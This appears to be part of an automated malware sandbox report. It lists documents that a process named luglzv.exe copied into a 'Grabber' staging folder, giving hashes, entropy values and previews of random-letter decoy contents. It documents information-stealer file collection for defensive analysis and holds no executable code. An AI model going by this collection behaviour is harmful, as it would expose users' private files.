                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  